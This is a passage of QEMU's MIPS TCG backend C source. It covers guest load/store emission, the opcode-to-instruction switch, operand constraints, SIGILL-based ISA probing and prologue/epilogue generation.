tcg_out_qemu_ld_direct(s, data_regl, data_regh, base, opc, is_64); #endif } static void tcg_out_qemu_st_direct(TCGContext *s, TCGReg lo, TCGReg hi, TCGReg base, MemOp opc) { /* Don't clutter the code below with checks to avoid bswapping ZERO. */ if ((lo | hi) == 0) { opc &= ~MO_BSWAP; } switch (opc & (MO_SIZE | MO_BSWAP)) { case MO_8: tcg_out_opc_imm(s, OPC_SB, lo, base, 0); break; case MO_16 | MO_BSWAP: tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, lo, 0xffff); tcg_out_bswap16(s, TCG_TMP1, TCG_TMP1); lo = TCG_TMP1; /* FALLTHRU */ case MO_16: tcg_out_opc_imm(s, OPC_SH, lo, base, 0); break; case MO_32 | MO_BSWAP: tcg_out_bswap32(s, TCG_TMP3, lo); lo = TCG_TMP3; /* FALLTHRU */ case MO_32: tcg_out_opc_imm(s, OPC_SW, lo, base, 0); break; case MO_64 | MO_BSWAP: if (TCG_TARGET_REG_BITS == 64) { tcg_out_bswap64(s, TCG_TMP3, lo); tcg_out_opc_imm(s, OPC_SD, TCG_TMP3, base, 0); } else if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_WSBH, TCG_TMP0, 0, MIPS_BE ? lo : hi); tcg_out_opc_reg(s, OPC_WSBH, TCG_TMP1, 0, MIPS_BE ? hi : lo); tcg_out_opc_sa(s, OPC_ROTR, TCG_TMP0, TCG_TMP0, 16); tcg_out_opc_sa(s, OPC_ROTR, TCG_TMP1, TCG_TMP1, 16); tcg_out_opc_imm(s, OPC_SW, TCG_TMP0, base, 0); tcg_out_opc_imm(s, OPC_SW, TCG_TMP1, base, 4); } else { tcg_out_bswap32(s, TCG_TMP3, MIPS_BE ? lo : hi); tcg_out_opc_imm(s, OPC_SW, TCG_TMP3, base, 0); tcg_out_bswap32(s, TCG_TMP3, MIPS_BE ? hi : lo); tcg_out_opc_imm(s, OPC_SW, TCG_TMP3, base, 4); } break; case MO_64: if (TCG_TARGET_REG_BITS == 64) { tcg_out_opc_imm(s, OPC_SD, lo, base, 0); } else { tcg_out_opc_imm(s, OPC_SW, MIPS_BE ? hi : lo, base, 0); tcg_out_opc_imm(s, OPC_SW, MIPS_BE ? lo : hi, base, 4); } break; default: tcg_abort(); } } static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is_64) { TCGReg addr_regl, addr_regh __attribute__((unused)); TCGReg data_regl, data_regh; TCGMemOpIdx oi; MemOp opc; #if defined(CONFIG_SOFTMMU) tcg_insn_unit *label_ptr[2]; #endif TCGReg base = TCG_REG_A0; data_regl = *args++; data_regh = (TCG_TARGET_REG_BITS == 32 && is_64 ? *args++ : 0); addr_regl = *args++; addr_regh = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? *args++ : 0); oi = *args++; opc = get_memop(oi); #if defined(CONFIG_SOFTMMU) tcg_out_tlb_load(s, base, addr_regl, addr_regh, oi, label_ptr, 0); tcg_out_qemu_st_direct(s, data_regl, data_regh, base, opc); add_qemu_ldst_label(s, 0, oi, (is_64 ? TCG_TYPE_I64 : TCG_TYPE_I32), data_regl, data_regh, addr_regl, addr_regh, s->code_ptr, label_ptr); #else base = TCG_REG_A0; if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, base, addr_regl); addr_regl = base; } if (guest_base == 0) { base = addr_regl; } else if (guest_base == (int16_t)guest_base) { tcg_out_opc_imm(s, ALIAS_PADDI, base, addr_regl, guest_base); } else { tcg_out_opc_reg(s, ALIAS_PADD, base, TCG_GUEST_BASE_REG, addr_regl); } tcg_out_qemu_st_direct(s, data_regl, data_regh, base, opc); #endif } static void tcg_out_mb(TCGContext *s, TCGArg a0) { static const MIPSInsn sync[] = { /* Note that SYNC_MB is a slightly weaker than SYNC 0, as the former is an ordering barrier and the latter is a completion barrier. */ [0 ... TCG_MO_ALL] = OPC_SYNC_MB, [TCG_MO_LD_LD] = OPC_SYNC_RMB, [TCG_MO_ST_ST] = OPC_SYNC_WMB, [TCG_MO_LD_ST] = OPC_SYNC_RELEASE, [TCG_MO_LD_ST | TCG_MO_ST_ST] = OPC_SYNC_RELEASE, [TCG_MO_LD_ST | TCG_MO_LD_LD] = OPC_SYNC_ACQUIRE, }; tcg_out32(s, sync[a0 & TCG_MO_ALL]); } static void tcg_out_clz(TCGContext *s, MIPSInsn opcv2, MIPSInsn opcv6, int width, TCGReg a0, TCGReg a1, TCGArg a2) { if (use_mips32r6_instructions) { if (a2 == width) { tcg_out_opc_reg(s, opcv6, a0, a1, 0); } else { tcg_out_opc_reg(s, opcv6, TCG_TMP0, a1, 0); tcg_out_movcond(s, TCG_COND_EQ, a0, a1, 0, a2, TCG_TMP0); } } else { if (a2 == width) { tcg_out_opc_reg(s, opcv2, a0, a1, a1); } else if (a0 == a2) { tcg_out_opc_reg(s, opcv2, TCG_TMP0, a1, a1); tcg_out_opc_reg(s, OPC_MOVN, a0, TCG_TMP0, a1); } else if (a0 != a1) { tcg_out_opc_reg(s, opcv2, a0, a1, a1); tcg_out_opc_reg(s, OPC_MOVZ, a0, a2, a1); } else { tcg_out_opc_reg(s, opcv2, TCG_TMP0, a1, a1); tcg_out_opc_reg(s, OPC_MOVZ, TCG_TMP0, a2, a1); tcg_out_mov(s, TCG_TYPE_REG, a0, TCG_TMP0); } } } static inline void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, const int *const_args) { MIPSInsn i1, i2; TCGArg a0, a1, a2; int c2; a0 = args[0]; a1 = args[1]; a2 = args[2]; c2 = const_args[2]; switch (opc) { case INDEX_op_exit_tb: { TCGReg b0 = TCG_REG_ZERO; a0 = (intptr_t)a0; if (a0 & ~0xffff) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_V0, a0 & ~0xffff); b0 = TCG_REG_V0; } if (!tcg_out_opc_jmp(s, OPC_J, tb_ret_addr)) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, (uintptr_t)tb_ret_addr); tcg_out_opc_reg(s, OPC_JR, 0, TCG_TMP0, 0); } tcg_out_opc_imm(s, OPC_ORI, TCG_REG_V0, b0, a0 & 0xffff); } break; case INDEX_op_goto_tb: if (s->tb_jmp_insn_offset) { /* direct jump method */ s->tb_jmp_insn_offset[a0] = tcg_current_code_size(s); /* Avoid clobbering the address during retranslation. */ tcg_out32(s, OPC_J | (*(uint32_t *)s->code_ptr & 0x3ffffff)); } else { /* indirect jump method */ tcg_out_ld(s, TCG_TYPE_PTR, TCG_TMP0, TCG_REG_ZERO, (uintptr_t)(s->tb_jmp_target_addr + a0)); tcg_out_opc_reg(s, OPC_JR, 0, TCG_TMP0, 0); } tcg_out_nop(s); set_jmp_reset_offset(s, a0); break; case INDEX_op_goto_ptr: /* jmp to the given host address (could be epilogue) */ tcg_out_opc_reg(s, OPC_JR, 0, a0, 0); tcg_out_nop(s); break; case INDEX_op_br: tcg_out_brcond(s, TCG_COND_EQ, TCG_REG_ZERO, TCG_REG_ZERO, arg_label(a0)); break; case INDEX_op_ld8u_i32: case INDEX_op_ld8u_i64: i1 = OPC_LBU; goto do_ldst; case INDEX_op_ld8s_i32: case INDEX_op_ld8s_i64: i1 = OPC_LB; goto do_ldst; case INDEX_op_ld16u_i32: case INDEX_op_ld16u_i64: i1 = OPC_LHU; goto do_ldst; case INDEX_op_ld16s_i32: case INDEX_op_ld16s_i64: i1 = OPC_LH; goto do_ldst; case INDEX_op_ld_i32: case INDEX_op_ld32s_i64: i1 = OPC_LW; goto do_ldst; case INDEX_op_ld32u_i64: i1 = OPC_LWU; goto do_ldst; case INDEX_op_ld_i64: i1 = OPC_LD; goto do_ldst; case INDEX_op_st8_i32: case INDEX_op_st8_i64: i1 = OPC_SB; goto do_ldst; case INDEX_op_st16_i32: case INDEX_op_st16_i64: i1 = OPC_SH; goto do_ldst; case INDEX_op_st_i32: case INDEX_op_st32_i64: i1 = OPC_SW; goto do_ldst; case INDEX_op_st_i64: i1 = OPC_SD; do_ldst: tcg_out_ldst(s, i1, a0, a1, a2); break; case INDEX_op_add_i32: i1 = OPC_ADDU, i2 = OPC_ADDIU; goto do_binary; case INDEX_op_add_i64: i1 = OPC_DADDU, i2 = OPC_DADDIU; goto do_binary; case INDEX_op_or_i32: case INDEX_op_or_i64: i1 = OPC_OR, i2 = OPC_ORI; goto do_binary; case INDEX_op_xor_i32: case INDEX_op_xor_i64: i1 = OPC_XOR, i2 = OPC_XORI; do_binary: if (c2) { tcg_out_opc_imm(s, i2, a0, a1, a2); break; } do_binaryv: tcg_out_opc_reg(s, i1, a0, a1, a2); break; case INDEX_op_sub_i32: i1 = OPC_SUBU, i2 = OPC_ADDIU; goto do_subtract; case INDEX_op_sub_i64: i1 = OPC_DSUBU, i2 = OPC_DADDIU; do_subtract: if (c2) { tcg_out_opc_imm(s, i2, a0, a1, -a2); break; } goto do_binaryv; case INDEX_op_and_i32: if (c2 && a2 != (uint16_t)a2) { int msb = ctz32(~a2) - 1; tcg_debug_assert(use_mips32r2_instructions); tcg_debug_assert(is_p2m1(a2)); tcg_out_opc_bf(s, OPC_EXT, a0, a1, msb, 0); break; } i1 = OPC_AND, i2 = OPC_ANDI; goto do_binary; case INDEX_op_and_i64: if (c2 && a2 != (uint16_t)a2) { int msb = ctz64(~a2) - 1; tcg_debug_assert(use_mips32r2_instructions); tcg_debug_assert(is_p2m1(a2)); tcg_out_opc_bf64(s, OPC_DEXT, OPC_DEXTM, OPC_DEXTU, a0, a1, msb, 0); break; } i1 = OPC_AND, i2 = OPC_ANDI; goto do_binary; case INDEX_op_nor_i32: case INDEX_op_nor_i64: i1 = OPC_NOR; goto do_binaryv; case INDEX_op_mul_i32: if (use_mips32_instructions) { tcg_out_opc_reg(s, OPC_MUL, a0, a1, a2); break; } i1 = OPC_MULT, i2 = OPC_MFLO; goto do_hilo1; case INDEX_op_mulsh_i32: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_MUH, a0, a1, a2); break; } i1 = OPC_MULT, i2 = OPC_MFHI; goto do_hilo1; case INDEX_op_muluh_i32: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_MUHU, a0, a1, a2); break; } i1 = OPC_MULTU, i2 = OPC_MFHI; goto do_hilo1; case INDEX_op_div_i32: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DIV_R6, a0, a1, a2); break; } i1 = OPC_DIV, i2 = OPC_MFLO; goto do_hilo1; case INDEX_op_divu_i32: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DIVU_R6, a0, a1, a2); break; } i1 = OPC_DIVU, i2 = OPC_MFLO; goto do_hilo1; case INDEX_op_rem_i32: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_MOD, a0, a1, a2); break; } i1 = OPC_DIV, i2 = OPC_MFHI; goto do_hilo1; case INDEX_op_remu_i32: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_MODU, a0, a1, a2); break; } i1 = OPC_DIVU, i2 = OPC_MFHI; goto do_hilo1; case INDEX_op_mul_i64: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DMUL, a0, a1, a2); break; } i1 = OPC_DMULT, i2 = OPC_MFLO; goto do_hilo1; case INDEX_op_mulsh_i64: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DMUH, a0, a1, a2); break; } i1 = OPC_DMULT, i2 = OPC_MFHI; goto do_hilo1; case INDEX_op_muluh_i64: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DMUHU, a0, a1, a2); break; } i1 = OPC_DMULTU, i2 = OPC_MFHI; goto do_hilo1; case INDEX_op_div_i64: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DDIV_R6, a0, a1, a2); break; } i1 = OPC_DDIV, i2 = OPC_MFLO; goto do_hilo1; case INDEX_op_divu_i64: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DDIVU_R6, a0, a1, a2); break; } i1 = OPC_DDIVU, i2 = OPC_MFLO; goto do_hilo1; case INDEX_op_rem_i64: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DMOD, a0, a1, a2); break; } i1 = OPC_DDIV, i2 = OPC_MFHI; goto do_hilo1; case INDEX_op_remu_i64: if (use_mips32r6_instructions) { tcg_out_opc_reg(s, OPC_DMODU, a0, a1, a2); break; } i1 = OPC_DDIVU, i2 = OPC_MFHI; do_hilo1: tcg_out_opc_reg(s, i1, 0, a1, a2); tcg_out_opc_reg(s, i2, a0, 0, 0); break; case INDEX_op_muls2_i32: i1 = OPC_MULT; goto do_hilo2; case INDEX_op_mulu2_i32: i1 = OPC_MULTU; goto do_hilo2; case INDEX_op_muls2_i64: i1 = OPC_DMULT; goto do_hilo2; case INDEX_op_mulu2_i64: i1 = OPC_DMULTU; do_hilo2: tcg_out_opc_reg(s, i1, 0, a2, args[3]); tcg_out_opc_reg(s, OPC_MFLO, a0, 0, 0); tcg_out_opc_reg(s, OPC_MFHI, a1, 0, 0); break; case INDEX_op_not_i32: case INDEX_op_not_i64: i1 = OPC_NOR; goto do_unary; case INDEX_op_bswap16_i32: case INDEX_op_bswap16_i64: i1 = OPC_WSBH; goto do_unary; case INDEX_op_ext8s_i32: case INDEX_op_ext8s_i64: i1 = OPC_SEB; goto do_unary; case INDEX_op_ext16s_i32: case INDEX_op_ext16s_i64: i1 = OPC_SEH; do_unary: tcg_out_opc_reg(s, i1, a0, TCG_REG_ZERO, a1); break; case INDEX_op_bswap32_i32: tcg_out_bswap32(s, a0, a1); break; case INDEX_op_bswap32_i64: tcg_out_bswap32u(s, a0, a1); break; case INDEX_op_bswap64_i64: tcg_out_bswap64(s, a0, a1); break; case INDEX_op_extrh_i64_i32: tcg_out_dsra(s, a0, a1, 32); break; case INDEX_op_ext32s_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extrl_i64_i32: tcg_out_opc_sa(s, OPC_SLL, a0, a1, 0); break; case INDEX_op_ext32u_i64: case INDEX_op_extu_i32_i64: tcg_out_ext32u(s, a0, a1); break; case INDEX_op_sar_i32: i1 = OPC_SRAV, i2 = OPC_SRA; goto do_shift; case INDEX_op_shl_i32: i1 = OPC_SLLV, i2 = OPC_SLL; goto do_shift; case INDEX_op_shr_i32: i1 = OPC_SRLV, i2 = OPC_SRL; goto do_shift; case INDEX_op_rotr_i32: i1 = OPC_ROTRV, i2 = OPC_ROTR; do_shift: if (c2) { tcg_out_opc_sa(s, i2, a0, a1, a2); break; } do_shiftv: tcg_out_opc_reg(s, i1, a0, a2, a1); break; case INDEX_op_rotl_i32: if (c2) { tcg_out_opc_sa(s, OPC_ROTR, a0, a1, 32 - a2); } else { tcg_out_opc_reg(s, OPC_SUBU, TCG_TMP0, TCG_REG_ZERO, a2); tcg_out_opc_reg(s, OPC_ROTRV, a0, TCG_TMP0, a1); } break; case INDEX_op_sar_i64: if (c2) { tcg_out_dsra(s, a0, a1, a2); break; } i1 = OPC_DSRAV; goto do_shiftv; case INDEX_op_shl_i64: if (c2) { tcg_out_dsll(s, a0, a1, a2); break; } i1 = OPC_DSLLV; goto do_shiftv; case INDEX_op_shr_i64: if (c2) { tcg_out_dsrl(s, a0, a1, a2); break; } i1 = OPC_DSRLV; goto do_shiftv; case INDEX_op_rotr_i64: if (c2) { tcg_out_opc_sa64(s, OPC_DROTR, OPC_DROTR32, a0, a1, a2); break; } i1 = OPC_DROTRV; goto do_shiftv; case INDEX_op_rotl_i64: if (c2) { tcg_out_opc_sa64(s, OPC_DROTR, OPC_DROTR32, a0, a1, 64 - a2); } else { tcg_out_opc_reg(s, OPC_DSUBU, TCG_TMP0, TCG_REG_ZERO, a2); tcg_out_opc_reg(s, OPC_DROTRV, a0, TCG_TMP0, a1); } break; case INDEX_op_clz_i32: tcg_out_clz(s, OPC_CLZ, OPC_CLZ_R6, 32, a0, a1, a2); break; case INDEX_op_clz_i64: tcg_out_clz(s, OPC_DCLZ, OPC_DCLZ_R6, 64, a0, a1, a2); break; case INDEX_op_deposit_i32: tcg_out_opc_bf(s, OPC_INS, a0, a2, args[3] + args[4] - 1, args[3]); break; case INDEX_op_deposit_i64: tcg_out_opc_bf64(s, OPC_DINS, OPC_DINSM, OPC_DINSU, a0, a2, args[3] + args[4] - 1, args[3]); break; case INDEX_op_extract_i32: tcg_out_opc_bf(s, OPC_EXT, a0, a1, args[3] - 1, a2); break; case INDEX_op_extract_i64: tcg_out_opc_bf64(s, OPC_DEXT, OPC_DEXTM, OPC_DEXTU, a0, a1, args[3] - 1, a2); break; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: tcg_out_brcond(s, a2, a0, a1, arg_label(args[3])); break; case INDEX_op_brcond2_i32: tcg_out_brcond2(s, args[4], a0, a1, a2, args[3], arg_label(args[5])); break; case INDEX_op_movcond_i32: case INDEX_op_movcond_i64: tcg_out_movcond(s, args[5], a0, a1, a2, args[3], args[4]); break; case INDEX_op_setcond_i32: case INDEX_op_setcond_i64: tcg_out_setcond(s, args[3], a0, a1, a2); break; case INDEX_op_setcond2_i32: tcg_out_setcond2(s, args[5], a0, a1, a2, args[3], args[4]); break; case INDEX_op_qemu_ld_i32: tcg_out_qemu_ld(s, args, false); break; case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, args, true); break; case INDEX_op_qemu_st_i32: tcg_out_qemu_st(s, args, false); break; case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, args, true); break; case INDEX_op_add2_i32: tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], const_args[4], const_args[5], false); break; case INDEX_op_sub2_i32: tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], const_args[4], const_args[5], true); break; case INDEX_op_mb: tcg_out_mb(s, a0); break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ case INDEX_op_mov_i64: case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_movi_i64: case INDEX_op_call: /* Always emitted via tcg_out_call. */ default: tcg_abort(); } } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef r_L = { .args_ct_str = { "r", "L" } }; static const TCGTargetOpDef rZ_r = { .args_ct_str = { "rZ", "r" } }; static const TCGTargetOpDef SZ_S = { .args_ct_str = { "SZ", "S" } }; static const TCGTargetOpDef rZ_rZ = { .args_ct_str = { "rZ", "rZ" } }; static const TCGTargetOpDef r_r_L = { .args_ct_str = { "r", "r", "L" } }; static const TCGTargetOpDef r_L_L = { .args_ct_str = { "r", "L", "L" } }; static const TCGTargetOpDef r_r_ri = { .args_ct_str = { "r", "r", "ri" } }; static const TCGTargetOpDef r_r_rI = { .args_ct_str = { "r", "r", "rI" } }; static const TCGTargetOpDef r_r_rJ = { .args_ct_str = { "r", "r", "rJ" } }; static const TCGTargetOpDef SZ_S_S = { .args_ct_str = { "SZ", "S", "S" } }; static const TCGTargetOpDef SZ_SZ_S = { .args_ct_str = { "SZ", "SZ", "S" } }; static const TCGTargetOpDef SZ_SZ_S_S = { .args_ct_str = { "SZ", "SZ", "S", "S" } }; static const TCGTargetOpDef r_rZ_rN = { .args_ct_str = { "r", "rZ", "rN" } }; static const TCGTargetOpDef r_rZ_rZ = { .args_ct_str = { "r", "rZ", "rZ" } }; static const TCGTargetOpDef r_r_rIK = { .args_ct_str = { "r", "r", "rIK" } }; static const TCGTargetOpDef r_r_rWZ = { .args_ct_str = { "r", "r", "rWZ" } }; static const TCGTargetOpDef r_r_r_r = { .args_ct_str = { "r", "r", "r", "r" } }; static const TCGTargetOpDef r_r_L_L = { .args_ct_str = { "r", "r", "L", "L" } }; static const TCGTargetOpDef dep = { .args_ct_str = { "r", "0", "rZ" } }; static const TCGTargetOpDef movc = { .args_ct_str = { "r", "rZ", "rZ", "rZ", "0" } }; static const TCGTargetOpDef movc_r6 = { .args_ct_str = { "r", "rZ", "rZ", "rZ", "rZ" } }; static const TCGTargetOpDef add2 = { .args_ct_str = { "r", "r", "rZ", "rZ", "rN", "rN" } }; static const TCGTargetOpDef br2 = { .args_ct_str = { "rZ", "rZ", "rZ", "rZ" } }; static const TCGTargetOpDef setc2 = { .args_ct_str = { "r", "rZ", "rZ", "rZ", "rZ" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8s_i32: case INDEX_op_ld16u_i32: case INDEX_op_ld16s_i32: case INDEX_op_ld_i32: case INDEX_op_not_i32: case INDEX_op_bswap16_i32: case INDEX_op_bswap32_i32: case INDEX_op_ext8s_i32: case INDEX_op_ext16s_i32: case INDEX_op_extract_i32: case INDEX_op_ld8u_i64: case INDEX_op_ld8s_i64: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld32u_i64: case INDEX_op_ld_i64: case INDEX_op_not_i64: case INDEX_op_bswap16_i64: case INDEX_op_bswap32_i64: case INDEX_op_bswap64_i64: case INDEX_op_ext8s_i64: case INDEX_op_ext16s_i64: case INDEX_op_ext32s_i64: case INDEX_op_ext32u_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: case INDEX_op_extrl_i64_i32: case INDEX_op_extrh_i64_i32: case INDEX_op_extract_i64: return &r_r; case INDEX_op_st8_i32: case INDEX_op_st16_i32: case INDEX_op_st_i32: case INDEX_op_st8_i64: case INDEX_op_st16_i64: case INDEX_op_st32_i64: case INDEX_op_st_i64: return &rZ_r; case INDEX_op_add_i32: case INDEX_op_add_i64: return &r_r_rJ; case INDEX_op_sub_i32: case INDEX_op_sub_i64: return &r_rZ_rN; case INDEX_op_mul_i32: case INDEX_op_mulsh_i32: case INDEX_op_muluh_i32: case INDEX_op_div_i32: case INDEX_op_divu_i32: case INDEX_op_rem_i32: case INDEX_op_remu_i32: case INDEX_op_nor_i32: case INDEX_op_setcond_i32: case INDEX_op_mul_i64: case INDEX_op_mulsh_i64: case INDEX_op_muluh_i64: case INDEX_op_div_i64: case INDEX_op_divu_i64: case INDEX_op_rem_i64: case INDEX_op_remu_i64: case INDEX_op_nor_i64: case INDEX_op_setcond_i64: return &r_rZ_rZ; case INDEX_op_muls2_i32: case INDEX_op_mulu2_i32: case INDEX_op_muls2_i64: case INDEX_op_mulu2_i64: return &r_r_r_r; case INDEX_op_and_i32: case INDEX_op_and_i64: return &r_r_rIK; case INDEX_op_or_i32: case INDEX_op_xor_i32: case INDEX_op_or_i64: case INDEX_op_xor_i64: return &r_r_rI; case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: case INDEX_op_rotr_i32: case INDEX_op_rotl_i32: case INDEX_op_shl_i64: case INDEX_op_shr_i64: case INDEX_op_sar_i64: case INDEX_op_rotr_i64: case INDEX_op_rotl_i64: return &r_r_ri; case INDEX_op_clz_i32: case INDEX_op_clz_i64: return &r_r_rWZ; case INDEX_op_deposit_i32: case INDEX_op_deposit_i64: return &dep; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: return &rZ_rZ; case INDEX_op_movcond_i32: case INDEX_op_movcond_i64: return use_mips32r6_instructions ? &movc_r6 : &movc; case INDEX_op_add2_i32: case INDEX_op_sub2_i32: return &add2; case INDEX_op_setcond2_i32: return &setc2; case INDEX_op_brcond2_i32: return &br2; case INDEX_op_qemu_ld_i32: return (TCG_TARGET_REG_BITS == 64 || TARGET_LONG_BITS == 32 ? &r_L : &r_L_L); case INDEX_op_qemu_st_i32: return (TCG_TARGET_REG_BITS == 64 || TARGET_LONG_BITS == 32 ? &SZ_S : &SZ_S_S); case INDEX_op_qemu_ld_i64: return (TCG_TARGET_REG_BITS == 64 ? &r_L : TARGET_LONG_BITS == 32 ? &r_r_L : &r_r_L_L); case INDEX_op_qemu_st_i64: return (TCG_TARGET_REG_BITS == 64 ? &SZ_S : TARGET_LONG_BITS == 32 ? &SZ_SZ_S : &SZ_SZ_S_S); default: return NULL; } } static const int tcg_target_callee_save_regs[] = { TCG_REG_S0, /* used for the global env (TCG_AREG0) */ TCG_REG_S1, TCG_REG_S2, TCG_REG_S3, TCG_REG_S4, TCG_REG_S5, TCG_REG_S6, TCG_REG_S7, TCG_REG_S8, TCG_REG_RA, /* should be last for ABI compliance */ }; /* The Linux kernel doesn't provide any information about the available instruction set. Probe it using a signal handler. */ #ifndef use_movnz_instructions bool use_movnz_instructions = false; #endif #ifndef use_mips32_instructions bool use_mips32_instructions = false; #endif #ifndef use_mips32r2_instructions bool use_mips32r2_instructions = false; #endif static volatile sig_atomic_t got_sigill; static void sigill_handler(int signo, siginfo_t *si, void *data) { /* Skip the faulty instruction */ ucontext_t *uc = (ucontext_t *)data; uc->uc_mcontext.pc += 4; got_sigill = 1; } static void tcg_target_detect_isa(void) { struct sigaction sa_old, sa_new; memset(&sa_new, 0, sizeof(sa_new)); sa_new.sa_flags = SA_SIGINFO; sa_new.sa_sigaction = sigill_handler; sigaction(SIGILL, &sa_new, &sa_old); /* Probe for movn/movz, necessary to implement movcond. */ #ifndef use_movnz_instructions got_sigill = 0; asm volatile(".set push\n" ".set mips32\n" "movn $zero, $zero, $zero\n" "movz $zero, $zero, $zero\n" ".set pop\n" : : : ); use_movnz_instructions = !got_sigill; #endif /* Probe for MIPS32 instructions. As no subsetting is allowed by the specification, it is only necessary to probe for one of the instructions. */ #ifndef use_mips32_instructions got_sigill = 0; asm volatile(".set push\n" ".set mips32\n" "mul $zero, $zero\n" ".set pop\n" : : : ); use_mips32_instructions = !got_sigill; #endif /* Probe for MIPS32r2 instructions if MIPS32 instructions are available. As no subsetting is allowed by the specification, it is only necessary to probe for one of the instructions. */ #ifndef use_mips32r2_instructions if (use_mips32_instructions) { got_sigill = 0; asm volatile(".set push\n" ".set mips32r2\n" "seb $zero, $zero\n" ".set pop\n" : : : ); use_mips32r2_instructions = !got_sigill; } #endif sigaction(SIGILL, &sa_old, NULL); } static tcg_insn_unit *align_code_ptr(TCGContext *s) { uintptr_t p = (uintptr_t)s->code_ptr; if (p & 15) { p = (p + 15) & -16; s->code_ptr = (void *)p; } return s->code_ptr; } /* Stack frame parameters. */ #define REG_SIZE (TCG_TARGET_REG_BITS / 8) #define SAVE_SIZE ((int)ARRAY_SIZE(tcg_target_callee_save_regs) * REG_SIZE) #define TEMP_SIZE (CPU_TEMP_BUF_NLONGS * (int)sizeof(long)) #define FRAME_SIZE ((TCG_STATIC_CALL_ARGS_SIZE + TEMP_SIZE + SAVE_SIZE \ + TCG_TARGET_STACK_ALIGN - 1) \ & -TCG_TARGET_STACK_ALIGN) #define SAVE_OFS (TCG_STATIC_CALL_ARGS_SIZE + TEMP_SIZE) /* We're expecting to be able to use an immediate for frame allocation. */ QEMU_BUILD_BUG_ON(FRAME_SIZE > 0x7fff); /* Generate global QEMU prologue and epilogue code */ static void tcg_target_qemu_prologue(TCGContext *s) { int i; tcg_set_frame(s, TCG_REG_SP, TCG_STATIC_CALL_ARGS_SIZE, TEMP_SIZE); /* TB prologue */ tcg_out_opc_imm(s, ALIAS_PADDI, TCG_REG_SP, TCG_REG_SP, -FRAME_SIZE); for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); i++) { tcg_out_st(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i], TCG_REG_SP, SAVE_OFS + i * REG_SIZE); } #ifndef CONFIG_SOFTMMU if (guest_base) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, guest_base); tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); } #endif /* Call generated code */ tcg_out_opc_reg(s, OPC_JR, 0, tcg_target_call_iarg_regs[1], 0); /* delay slot */ tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); /* * Return path for goto_ptr. Set return value to 0, a-la exit_tb, * and fall through to the rest of the epilogue. */ s->code_gen_epilogue = s->code_ptr; tcg_out_mov(s, TCG_TYPE_REG, TCG_REG_V0, TCG_REG_ZERO); /* TB epilogue */ tb_ret_addr = s->code_ptr; for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); i++) { tcg_out_ld(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i], TCG_REG_SP, SAVE_OFS + i * REG_SIZE); } tcg_out_opc_reg(s, OPC_JR, 0, TCG_REG_RA, 0); /* delay slot */ tcg_out_opc_imm(s, ALIAS_PADDI, TCG_REG_SP, TCG_REG_SP, FRAME_SIZE); if (use_mips32r2_instructions) { return; } /* Bswap subroutines: Input in TCG_TMP0, output in TCG_TMP3; clobbers TCG_TMP1, TCG_TMP2. */ /* * bswap32 -- 32-bit swap (signed result for mips64). a0 = abcd. */ bswap32_addr = align_code_ptr(s); /* t3 = (ssss)d000 */ tcg_out_opc_sa(s, OPC_SLL, TCG_TMP3, TCG_TMP0, 24); /* t1 = 000a */ tcg_out_opc_sa(s, OPC_SRL, TCG_TMP1, TCG_TMP0, 24); /* t2 = 00c0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP2, TCG_TMP0, 0xff00); /* t3 = d00a */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); /* t1 = 0abc */ tcg_out_opc_sa(s, OPC_SRL, TCG_TMP1, TCG_TMP0, 8); /* t2 = 0c00 */ tcg_out_opc_sa(s, OPC_SLL, TCG_TMP2, TCG_TMP2, 8); /* t1 = 00b0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, TCG_TMP1, 0xff00); /* t3 = dc0a */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP2); 